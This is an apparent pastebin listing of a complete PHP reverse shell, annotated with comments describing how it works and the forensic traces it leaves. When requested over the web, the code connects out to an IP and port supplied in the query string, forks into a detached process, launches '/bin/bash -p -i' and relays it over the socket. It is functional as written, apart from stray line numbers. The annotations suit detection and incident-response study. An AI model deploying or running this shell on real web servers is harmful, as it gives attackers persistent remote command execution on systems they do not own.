
shell (unencrypted) v6

a guest
Jul 18th, 2019
<?php
// Analyst's reading of this listing: it is a PHP reverse shell of the
// pentestmonkey style. When the script is requested over HTTP it opens an
// OUTBOUND TCP connection from the web server to a host/port taken from the
// request's query string, starts a bash process, and relays bytes between the
// socket and the shell's stdin/stdout/stderr until either side closes.
// Artefacts this leaves for detection/IR: an access-log entry whose query
// string carries `ip=` and `port=` (the callback destination), an outbound
// connection originating from the web-server worker, and a `/bin/bash -p -i`
// child process of that worker (or, if pcntl is available, a detached
// session-leader process that outlives the HTTP request).
set_time_limit (0);   // lift max_execution_time so the relay loop below is not killed by PHP
$VERSION = "1.0";     // not used anywhere in this file
$ip = $_GET["ip"];    // callback host, taken unvalidated from the request query string
$port = $_GET["port"]; // callback port, likewise supplied by whoever sends the request
$chunk_size = 1400;   // bytes read per fread() in the relay loop
$write_a = null;      // write set for stream_select(): not monitored
$error_a = null;      // except set for stream_select(): not monitored
$shell = '/bin/bash -p -i'; // -p: bash privileged mode (effective uid/gid not reset to real ones, no startup files); -i: interactive
$daemon = 0;          // flipped to 1 only after a successful fork + setsid below
$debug = 0;           // non-zero echoes every relayed chunk through printit()

if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit. The child keeps running after
    // the HTTP request that launched it has completed. If the pcntl extension
    // is not loaded, the script falls through to the WARNING branch and the
    // shell stays attached to the request's worker process instead.
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if ($pid) {
        exit(0); // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

// Change to a safe directory (standard daemonisation step: do not pin the
// directory the web server was serving from)
chdir("/");

// Remove any umask we inherited: files the spawned shell later creates get
// exactly the mode their creator requests, with no bits masked off
umask(0);

// Connect OUT to the caller-supplied address. The 30 is the connect timeout
// in seconds; on failure $errstr/$errno are printed and the script exits
// before any shell is started.
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

// Spawn shell process
$descriptorspec = array(
    0 => array("pipe", "r"), // stdin is a pipe that the child will read from
    1 => array("pipe", "w"), // stdout is a pipe that the child will write to
    2 => array("pipe", "w") // stderr is a pipe that the child will write to
);

// $pipes[0..2] become the PHP-side ends of the child's stdin/stdout/stderr
$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

// This banner (with the callback destination) is emitted via printit()
printit("Successfully opened reverse shell to $ip:$port");

// Relay loop: runs until the TCP peer hangs up or the shell exits
while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    // Wait until a command is sent down $sock, or some
    // command output is available on STDOUT or STDERR.
    // Timeout is null, so this blocks indefinitely; stream_select() then
    // narrows $read_a in place to the streams that are actually readable.
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN (socket -> shell direction)
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection (shell -> socket direction)
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection (stderr is merged onto the same socket)
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

// Tear down: close the socket and all three pipe ends, then reap the child
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

  125. 125 // Like print, but does nothing if we've daemonised ourself
  126. 126 // (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
    // Emit $string followed by a newline. The intent (see the comment above)
    // is to stay silent once daemonised, but $daemon here is an undeclared
    // function-local variable - there is no `global $daemon` - so the guard
    // is always true and every message is printed regardless of whether the
    // fork succeeded. For an analyst this means the status/error strings in
    // this file are a visible artefact of the script having run.
    if (!$daemon) {
        print "$string\n";
    }
}
  132. 132 ?>